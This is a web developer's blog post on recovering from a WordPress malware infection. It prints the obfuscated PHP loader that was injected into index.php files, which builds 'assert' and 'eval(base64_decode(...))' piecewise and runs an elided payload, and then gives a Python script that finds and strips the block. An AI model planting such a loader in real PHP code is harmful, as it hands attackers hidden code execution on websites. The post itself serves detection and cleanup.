Excuse The Site Downtime.

Please excuse the site downtime for HackerAttitude.com


We experienced a malware script that located index.php files and injected code into them. It looks like an exploit allowed a zip file to be uploaded and executed. The injected code is very well written and is actually rather nice; the outcome isn't nice, but I can still appreciate the code.

How can I tell if this is the problem with my WordPress site?

Check for a zip file in the root directory. Mine was named npogf.zip. There was also a directory with the same name; inside it you can see a folder for a website theme, and some PHP that changes the php.ini settings so the malware can run on this site.

Strange PHP files with what look like random names.

Your index.php files will contain a block like this (the base64 payload inside the quotes is omitted here):

//###=CACHE START=###
// Hide errors and make assert() evaluate string arguments quietly.
@ini_set("display_errors", 0);
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

// Builds the function names "assert" and "str_rot13" piecewise to evade simple pattern matching.
$strings = "as"; $strings .= "se"; $strings .= "rt";
$strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13";
// "riny(" is ROT13 for "eval("; the rest decodes to "base64_decode(...)".
$gbz = "riny(".$strings2("base64_decode");
$light = $strings2($gbz.'("      "));');
// Equivalent to assert('eval(base64_decode("<payload>"));'), which runs the hidden payload.
$strings($light);
//###=CACHE END=###



How Do I Fix This?

The author of searchAndDestroy has created a nice search and replace script on GitHub. He explains: "to help clean up some lovely injected PHP that I found on one of my web servers. Seems the malware was injected into my server through an exploit in a highly popular but very old wordpress theme hosted by one of my virtual hosts. The malware spread to other wordpress installs. Fricksauce."
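The two checks above (a zip file in the site root, and index.php files carrying the CACHE START/END markers) can be scripted so you can sweep every WordPress install on a host at once. The following is an added example written for this post; it is not the searchAndDestroy script and not code from the original post. It assumes, as the post's sample shows, that the injection is always bracketed by the `//###=CACHE START=###` and `//###=CACHE END=###` markers, and it writes a `.bak` copy before rewriting anything. The demo site it builds (including an empty npogf.zip) is constructed sample data, not a real capture.

```python
#!/usr/bin/env python3
"""Scan a WordPress tree for the marker-delimited index.php injection and strip it.

Added example (not the post's or searchAndDestroy's code). Assumptions:
the injected block is always bracketed by the CACHE START/END markers quoted
in the post, and writing a .bak copy next to each cleaned file is acceptable.
"""
import re
import shutil
import tempfile
from pathlib import Path

START_MARKER = "//###=CACHE START=###"
END_MARKER = "//###=CACHE END=###"
# Non-greedy match from START to END across newlines, plus the trailing newline.
INJECTION_RE = re.compile(
    re.escape(START_MARKER) + r".*?" + re.escape(END_MARKER) + r"[ \t]*\n?",
    re.DOTALL,
)


def strip_injection(source: str) -> str:
    """Return the PHP source with every marker-delimited block removed."""
    return INJECTION_RE.sub("", source)


def find_injected_files(root):
    """Return sorted paths of index.php files under root that carry the marker."""
    hits = []
    for path in Path(root).rglob("index.php"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if START_MARKER in text:
            hits.append(path)
    return sorted(hits)


def find_root_zips(root):
    """List zip archives sitting directly in the site root (the post's first check)."""
    return sorted(p for p in Path(root).iterdir()
                  if p.is_file() and p.suffix.lower() == ".zip")


def clean_tree(root, dry_run=True):
    """Strip the injection from every hit; with dry_run=False, back up and rewrite."""
    cleaned = []
    for path in find_injected_files(root):
        original = path.read_text(encoding="utf-8", errors="replace")
        fixed = strip_injection(original)
        if fixed != original:
            if not dry_run:
                shutil.copy2(path, Path(str(path) + ".bak"))  # keep evidence
                path.write_text(fixed, encoding="utf-8")
            cleaned.append(path)
    return cleaned


def build_demo_site(base=None):
    """Construct a tiny infected site layout (sample data, not a real capture)."""
    base = Path(base or tempfile.mkdtemp(prefix="wp-demo-"))
    (base / "wp-content" / "themes" / "demo").mkdir(parents=True)
    # Empty-archive signature standing in for the dropped zip named in the post.
    (base / "npogf.zip").write_bytes(b"PK\x05\x06" + b"\x00" * 18)
    infected = (
        "<?php\n"
        "//###=CACHE START=###\n"
        '@ini_set("display_errors", 0);\n'
        '$strings = "as"; $strings .= "se"; $strings .= "rt"; // payload elided\n'
        "//###=CACHE END=###\n"
        "define('WP_USE_THEMES', true);\n"
        "require('./wp-blog-header.php');\n"
    )
    (base / "index.php").write_text(infected, encoding="utf-8")
    (base / "wp-content" / "themes" / "demo" / "index.php").write_text(
        "<?php get_header();\n", encoding="utf-8")
    return base


if __name__ == "__main__":
    site = build_demo_site()
    print("zip files in root:", [p.name for p in find_root_zips(site)])
    print("injected index.php files:",
          [str(p.relative_to(site)) for p in find_injected_files(site)])
    print("would clean:", len(clean_tree(site, dry_run=True)))
    cleaned = clean_tree(site, dry_run=False)
    print("cleaned:", len(cleaned), "remaining hits:", len(find_injected_files(site)))
```

Run it against a real docroot by calling `find_root_zips`, `find_injected_files` and then `clean_tree(root, dry_run=False)` only after reviewing the dry-run list; the `.bak` copies preserve the injected files for later analysis. Cleaning index.php removes the foothold but not the cause, so the uploaded zip, its extracted directory and the vulnerable theme still need to be removed.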



Hope this helps. My best advice for going through something like this is not to get upset. Learn from the mistake and keep an eye open for similar things in the future. If nothing else, you can read over the code and really appreciate the work that has gone into it.

Eddie Dounn

Web developer by day. Enthusiast by night. Owner of VAZED
